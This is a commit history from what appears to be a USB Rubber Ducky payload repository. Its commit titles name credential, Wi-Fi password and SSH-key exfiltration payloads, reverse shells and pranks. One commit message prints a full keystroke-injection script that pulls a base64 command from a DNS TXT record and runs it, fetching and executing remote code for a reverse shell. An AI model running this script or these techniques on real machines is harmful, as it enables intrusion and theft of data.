e4a7876a00
Update version badge
2024-08-22 22:17:24 +02:00
f7d2f37def
Remove duplicate function
2024-08-22 22:16:56 +02:00
d02b817225
Merge pull request #400 from aleff-github/patch-80
...
Exfiltrate Windows Product Key
2024-08-21 18:42:57 -04:00
828c60acca
Adapted with DUCKY_DRIVE_LABEL
2024-08-21 07:41:47 +02:00
404640f615
Merge pull request #427 from aleff-github/patch-83
...
Extension: SAVE FILES IN RUBBER DUCKY STORAGE
2024-08-20 17:04:28 -04:00
9e6b405745
from - to _
2024-08-20 12:33:10 +02:00
c895160753
from - to _
2024-08-20 12:27:36 +02:00
afe674fcda
Create README.md
2024-08-06 19:30:25 -05:00
a9afcc0c6d
Create Kill-Explorer.txt
...
initial commit with ducky script
2024-08-06 19:29:22 -05:00
e1531cc317
Merge pull request #468 from nathansb2022/master
...
Create payload DNS-TXT-CommandInjection.txt
2024-08-06 17:19:17 -04:00
f0cb608d09
Add Windows-Screenshot-Exfil payload
2024-08-06 09:58:39 +02:00
f2896f0b6f
Update DNS-TXT-CommandInjection.txt
...
Added PASSIVE_WINDOWS_DETECT EXTENSION per requested changes in pull request.
2024-08-05 14:21:46 -05:00
8eba7c5e9b
Delete payloads/library/execution/Kill-Explorer directory
2024-08-04 20:13:49 -05:00
5928326db7
Update README.md
2024-08-04 20:08:11 -05:00
42d2d6e9d5
Create Kill-Explorer.txt
2024-08-04 20:07:36 -05:00
97ae3a7339
Create README.md
2024-08-04 20:06:35 -05:00
e1c39bd455
Create DNS-TXT-CommandInjection.txt
...
Made changes requested from pull request. 1. Please remove this file as it is not needed. - removed .gitignore
2. I would recommend using a REM_BLOCK - added REM_BLOCK
3. I would include all of this in your readme.md it should contain all of this information. Having it in the payload clutters up the actually payload content. - Removed the clutter
4. If your target machine is windows you can use the PASSIVE_WINDOWS_DETECT extension. This extension will dynamically determine start delay and also ensure that the payload is ran on the correct OS. - added EXTENSION PASSIVE_WINDOWS_DETECT and updated the extension to new version. Ended up with the payload not executing.So, removed extension added in delay.
5. I would recommend using STRINGLN - added STRINGLN
6. also make sure to have a # before your DEFINE calls. #MY_TARGET_URL - added the # to MY_TARGET_URL
7. Why is this ps1 included? - removed ConvertBase64.ps1
8. Why is this file included? this is just a .txt of the powershellReverseShellOne-liner.ps1 file you uploaded. - removed T1.txt
2024-08-04 18:08:21 -05:00
f43a37e607
Create powershellReverseShellOne-liner.ps1
...
updated comments
2024-08-04 18:04:18 -05:00
5ff699caa2
Update README.md
...
fixed formatting
2024-08-04 18:01:43 -05:00
ae0d976dce
Update README.md
...
fixed formatting
2024-08-04 18:01:10 -05:00
7658b87ce0
Update README.md
...
fixed readme formatting
2024-08-04 18:00:29 -05:00
abd0a09360
Create README.md
...
Updated to reflect requested changes from pull request.
2024-08-04 17:58:09 -05:00
c8e0ac280b
Delete payloads/library/execution/DNS-TXT-CommandInjection directory
...
deleting and removing files from requested changes in Pull request
2024-08-04 14:29:33 -05:00
1fd0843049
Delete payloads/library/execution/DNS-TXT-CommandInection directory
...
misspelled injection, deleting the directory, all content has been moved to DNS-TXT-CommandInjection direcotory
2024-08-04 10:46:16 -05:00
7c989706cc
Update DNS-TXT-CommandInjection.txt
...
updated folder, misspelled injection and update link to ConvertBase64.ps1
2024-08-04 10:41:20 -05:00
c1608976d9
Update README.md
...
updated folder, misspelled injection and updated link to ConvertBase64.ps1
2024-08-04 10:38:54 -05:00
072a5dbc8a
Create ConvertBase64.ps1
...
updated folder, misspelled injection
2024-08-04 10:37:16 -05:00
cea9eb46ef
Create powershellReverseShellOne-liner.ps1
...
updated folder, misspelled commandInjection
2024-08-04 10:35:42 -05:00
e985ed3a61
Create T1.txt
...
updated folder, misspelled injection
2024-08-04 10:34:32 -05:00
3b8a1d9ec5
Create README.md
...
updating to new folder, misspelled injection
2024-08-04 10:33:19 -05:00
c832c1868c
Create DNS-TXT-CommandInjection.txt
...
misspelled Injection in file name
2024-08-04 10:31:39 -05:00
867b15eb6d
Create .gitignore
...
misspelled folder
2024-08-04 10:29:45 -05:00
054f81e077
Update DNS-TXT-CommandInection.txt
...
misspelled injection
2024-08-04 10:24:30 -05:00
e4cbee78f1
Update README.md
...
misspelled injection
2024-08-04 10:23:43 -05:00
2782d874c9
Update README.md
2024-08-03 23:50:18 -05:00
ada8bf9ea7
Update DNS-TXT-CommandInection.txt
2024-08-03 23:47:09 -05:00
13355e8519
Update README.md
2024-08-03 23:43:50 -05:00
fc745db314
Update README.md
2024-08-03 23:40:57 -05:00
b4978b7b47
Update DNS-TXT-CommandInection.txt
2024-08-03 23:37:33 -05:00
1db132c3ac
Update README.md
2024-08-03 23:36:21 -05:00
902412339b
Update DNS-TXT-CommandInection.txt
2024-08-03 23:35:02 -05:00
7a36e6324a
Update powershellReverseShellOne-liner.ps1
2024-08-03 23:33:41 -05:00
dad3d550fe
Create DNS-TXT-CommandInection.txt
...
REM Title: DNS-TXT-CommandInection
REM Author: Nate
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM and an example of creating your DNS TXT record in AWS Route53 service.
REM Target: Windows 10, 11
REM Props: Hak5, Darren Kitchen, Korben
REM Version: 1.0
REM Category: Execution
REM CONFIGURATION
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
REM reverseshell.
REM REQUIRED - Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
REM into DNS TXT record.
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM The link below has the Powershell script to convert your payloads to Base64.
REM https://
DELAY 1000
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
2024-08-03 23:32:09 -05:00
571e2e6e33
Create T1.txt
2024-08-03 23:30:46 -05:00
3578034173
Create powershellReverseShellOne-liner.ps1
2024-08-03 23:30:02 -05:00
b31e55d14a
Create convertBase64.ps1
2024-08-03 23:29:01 -05:00
784e37b063
Create README.md
2024-08-03 23:27:09 -05:00
460c95f5df
Update .gitignore
2024-08-03 21:19:44 -05:00
b1999a0e7e
Create .gitignore
...
.gitignore as a placeholder
2024-08-03 21:17:34 -05:00
c5fe32cf05
Update payload.txt
2024-07-24 22:12:43 +02:00
8754d6eab4
Update sy_cred.ps1
2024-07-24 21:23:43 +02:00
791133a14e
Update README.md
2024-07-24 21:23:04 +02:00
dc4ccd1874
Update README.md
2024-07-24 21:22:14 +02:00
7972203c71
Update README.md
2024-07-24 21:18:14 +02:00
10b6ea2f0e
Update sy_cred.ps1
2024-07-24 21:15:49 +02:00
3dc6750316
Update payload.txt
2024-07-24 21:14:16 +02:00
fcc1caf610
Update sy_cred.ps1
2024-07-24 19:58:46 +02:00
d68bf2967f
Update payload.txt
2024-07-24 19:52:11 +02:00
c231b242cb
Create sy_cred.ps1
2024-07-24 19:51:53 +02:00
ab486b9b9f
Create payload.txt
2024-07-24 19:50:19 +02:00
4f1ae9c312
Create README.md
2024-07-24 19:47:41 +02:00
30de5c0260
Merge pull request #465 from F1ll0ry/master
...
WiFi-Passwords-Exfiltration-Via-SCP
2024-07-23 03:14:22 -04:00
6bce38ad77
Renamed directory from WiFi-Passwords-Exfiltration to WiFi-Passwords-Exfiltration-Via-SCP
2024-07-22 09:01:08 +00:00
e17abcfa02
Merge pull request #464 from PlumpyTurkey/master
...
Updates extensions and payloads
2024-07-21 21:16:19 -04:00
023c46c15a
Fixed a typo in the extension
2024-07-19 01:40:38 +03:00
152f89c78d
fixed the extension
2024-07-19 01:34:58 +03:00
c79209168a
Update payload.txt
...
Fixing my mistake of wrong extension.
2024-07-18 16:56:45 -04:00
6a33d49db1
Update payload.txt
...
Fixing Extension call. content was missing.
2024-07-18 16:54:34 -04:00
cd3d4e7e42
Create README.md
2024-07-18 12:05:14 +03:00
25b879d4ff
Create Payload.txt
2024-07-18 12:04:12 +03:00
17b28cd2ee
Moved WiFi-Passwords-Exfiltration files to exfiltration directory
2024-07-18 11:51:12 +03:00
50812cddfa
Updated a typo
2024-07-18 11:35:55 +03:00
114209b817
Create README.md
2024-07-18 10:59:30 +03:00
c174b59c50
Create payload.txt
2024-07-18 10:56:11 +03:00
da3191f6f2
Updates version badge
2024-07-12 16:51:33 +02:00
3e5ca780e6
Updates extensions
2024-07-12 16:46:13 +02:00
52f6bdbc6f
Uses a function instead of executing directly
2024-07-12 16:41:39 +02:00
b469affe05
Merge pull request #410 from Mr-Proxy-source/master
...
1 New Mobile IOS payload | 2 New Exfiltration payloads
2024-07-11 10:51:10 -04:00
c59a06365e
Added line number.
2024-07-10 01:41:10 +02:00
69b17636d2
Remove link.
2024-07-10 01:40:38 +02:00
d67cbf2004
Added instructions to readme.
2024-07-10 01:40:10 +02:00
a8411c91f7
Fix link.
2024-07-10 01:35:51 +02:00
4fb883c8ee
Merge pull request #354 from aleff-github/patch-68
...
Defend Yourself From CVE-2023-23397
2024-07-09 09:45:15 -04:00
b19ede4efe
Merge pull request #461 from F1ll0ry/master
...
The-Perfect-Stealthy-Payload
2024-07-09 09:32:00 -04:00
fd925f1fe3
Rename folder from 'Cache Folder Exclusion & Payload Download + Persistence' to 'The-Perfect-Stealthy-Payload'
2024-07-09 06:30:20 +00:00
6a5a148642
Revert "Rename payloads/library/general/Cache Folder Exclusion & Payload Download + Persistence/README.md to payloads/library/general/The-Perfect-Stealthy-Payload"
...
This reverts commit 972d70d78e
2024-07-09 06:26:21 +00:00
972d70d78e
Rename payloads/library/general/Cache Folder Exclusion & Payload Download + Persistence/README.md to payloads/library/general/The-Perfect-Stealthy-Payload
2024-07-09 09:18:47 +03:00
25a18f4e96
[+] PASSIVE_WINDOWS_DETECT
2024-07-09 07:35:40 +02:00
db42b39dc0
Removing made changes.
2024-07-03 18:59:09 +02:00
50faacbf53
Update payload.txt
2024-07-03 10:58:31 +03:00
1309e9b825
Update payload.txt
2024-07-03 10:57:30 +03:00
f1c213b48c
Update README.md
2024-07-03 10:56:17 +03:00
ffea938417
Fixed defining for google exfil
2024-07-02 12:12:43 +02:00
c4aaea55be
Fix for defining
2024-07-02 12:11:11 +02:00
18e495712b
added PASSIVE_WINDOWS_DETECT
2024-07-01 14:21:10 +03:00
6afdd39d95
add onemillioncheckboxes.com checker payload
2024-06-26 17:02:10 -04:00
1bdf62bc7e
Merge pull request #431 from PlumpyTurkey/master
...
New Payloads and Extensions
2024-06-26 16:45:10 -04:00
07a4f98dc9
Update payload.txt
2024-06-25 15:50:21 +03:00
9cb9099976
Create README.md
...
initial commit
2024-06-25 13:26:57 +03:00
95c823b642
initial commit
...
Created the Payload
2024-06-25 13:16:31 +03:00
68997ce959
Update payload.txt
2024-06-11 19:57:36 -07:00
cd63cd6b2e
Fixing REM typo
2024-06-10 11:57:26 -04:00
bf5044f3c7
Update payload.txt
2024-06-10 08:47:04 -07:00
cd3704042c
Merge pull request #411 from Kr1ss-XD/patch-DuckyLogger
...
Patch ducky logger
2024-06-09 15:27:26 -04:00
b59f95f00d
Merge pull request #453 from aleff-github/patch-86
...
Prank In The Middle - Thunderbird
2024-06-06 22:02:49 -04:00
255713357b
[+] STRINGLN_POWERSHELL
2024-06-06 10:03:22 +02:00
a787588a04
Merge pull request #442 from thomasgruebl/new-sshkey-exfiltration-feature
...
adding new ExfiltrateSSHKeys payload
2024-06-05 15:29:07 -04:00
4650098cea
Merge pull request #441 from wino-willy/wino-willy-BeEF_Injection
...
Wino willy BeEF Injection
2024-06-05 15:24:02 -04:00
d9b3ac4ed3
Merge pull request #443 from aleff-github/patch-84
...
This Damn Shell Doesn't Work, SO SAD! :C
2024-06-05 15:00:51 -04:00
8ba844143c
Merge pull request #444 from aleff-github/patch-85
...
Dump Windows Memory Through ProcDump
2024-06-05 14:16:21 -04:00
510c6dadf6
Add missing quotes
2024-06-04 12:28:22 +02:00
fe2a080aae
Update payload.txt
2024-06-04 07:39:16 +02:00
9ac4d543b1
Image removed to lighten repository
2024-06-03 09:02:52 +02:00
f2e1f66bc6
Prank In The Middle - Thunderbird
...
The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank.
I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.
2024-06-03 08:53:17 +02:00
3da90fee4d
Small updates
2024-06-02 13:25:50 +02:00
ea737c4c6d
Various small updates
2024-06-02 13:23:36 +02:00
f8a4371552
Update "PowerShell To Dropbox" Extension
2024-06-02 13:21:39 +02:00
ba07d3810e
Merge branch 'hak5:master' into master
2024-06-02 10:21:10 +00:00
3627585903
Redefined from "#ONE_ONLY_IF..." to "#TARGET_KALI_LINUX"
2024-06-01 10:50:35 +02:00
f143daa518
Redefined DEFINEtions from $ to #
2024-06-01 10:47:20 +02:00
2e892e4b0e
Aporting hak5peaks tips
...
[#] Extension renamed to `_` instead of `-` and only all caps
[#] Windows to all caps
[+] Added #DRIVER-LABEL
[#] Unordered spacing removed
2024-06-01 10:26:10 +02:00
40f7f072ea
Changed Username
2024-05-28 19:25:26 +02:00
821255659e
Tip from hak5peaks
2024-05-23 18:05:34 +02:00
942bd88b8b
Tip from hak5peaks
2024-05-23 18:01:01 +02:00
45ab8a2a48
Merge pull request #437 from jbjb6000/patch-1
...
Update payload.txt
2024-05-21 21:35:16 -04:00
f134a9bd65
making requested changes
2024-05-18 10:16:58 +02:00
7aed09beb7
README
2024-03-26 10:15:14 +01:00
dbe778bb92
Dump Windows Memory Through ProcDump
...
This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump.
2024-03-26 10:11:55 +01:00
05b31b2756
DELAY
2024-03-20 10:37:51 +01:00
f6736094e9
ALT F4
2024-03-20 10:33:42 +01:00
0cf15c4743
readme
2024-03-20 10:09:40 +01:00
ea4efd07b8
This damn shell doesn't work, SO SAD! :C
...
This payload can be used to prank your friends so that when they open their terminal it will close immediately.
I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.
2024-03-20 10:05:27 +01:00
c1e4956391
adding new ExfiltrateSSHKeys payload
2024-03-16 11:50:56 +01:00
e3842d8a78
Update payload.txt
...
Missed a few grammatical errors
2024-03-15 05:25:57 -07:00
c6a048252d
BeEF_Injection
...
Hello,
Long time listener, first time caller. I came up with this payload when I was trying to figure out a quick way to hook a browser using the BeEF framework. The premise is pretty simple, it opens a bunch of Chrome tabs and the idea being that one of them is the attackers hosted ip/domain. I chose to write in DS 1.0 so it is as backwards compatible as possible. Anyways I read the submission guidelines carefully so let me know if I'm off in any way.
Any and all help is much appreciated.
Sincerely,
\/\/1/\/0
\/\/1|_|_Y
2024-03-15 05:09:01 -07:00
8bc5dd096c
Update payload.txt
...
Fixed spelling and grammar errors in the comments
2024-03-06 20:34:11 +00:00
b3c95f7b7d
Update payload.txt
...
Updated the zip file to point to the new version path.
2024-02-08 18:01:26 -05:00
a8e430148d
Update 1 payload
...
- Update "Windows Privilege Excalibur" payload
2024-01-20 19:05:20 +01:00
05014bee3f
Add 1 extension and 2 payloads
...
- Add "Run Hosted PowerShell" extension
- Add "Windows Duck In The Middle" payload
- Add "Windows Product Key Grabber" payload
2024-01-20 19:02:46 +01:00
761a5fa08c
Remove 1 extension and 1 payload
...
- Remove "PowerShell To Dropbox" extension
- Remove "Windows Product Duckey" payload
2024-01-20 18:54:57 +01:00
35fc314e15
Update payload.txt
2024-01-14 12:56:38 +01:00
203bf15391
Update README.md
2024-01-14 12:56:23 +01:00
76b023efa3
Update README.md
2024-01-14 12:55:18 +01:00
dc5c20e7ac
Update README.md
2024-01-14 11:51:58 +01:00
bf9ec4cfc0
Merge remote-tracking branch 'upstream/master' into patch-66
2024-01-14 11:43:28 +01:00
8d3adb90ad
space removed
2024-01-14 11:27:35 +01:00
bf2dfb7c17
Merge pull request #347 from aleff-github/patch-64
...
Install And Run Any Arbitrary Executable - No Internet And Root Needed
2024-01-08 02:24:00 -05:00
6cf55d1bd6
Merge pull request #346 from aleff-github/patch-63
...
Send Messages In Discord Channel-Server
2024-01-08 02:23:09 -05:00
2fea45c738
Merge pull request #342 from aleff-github/patch-61
...
Try To Catch Me
2024-01-08 02:22:09 -05:00
d75f9f96cc
Merge pull request #341 from aleff-github/patch-60
...
Create And Exfiltrate A Webhook Of Discord
2024-01-08 02:21:56 -05:00
Julien M
Peaks
Alessandro Greco
Nate
Thomas Boeglin
Nicolo’
zb0r
Robert Naame
Mr. Proxy
Dallas Winger
LulzAnarchyAnon
0i41E
Thomas Gruebl
wino-willy
Matthew Kayne
jbjb6000
Dallas Winger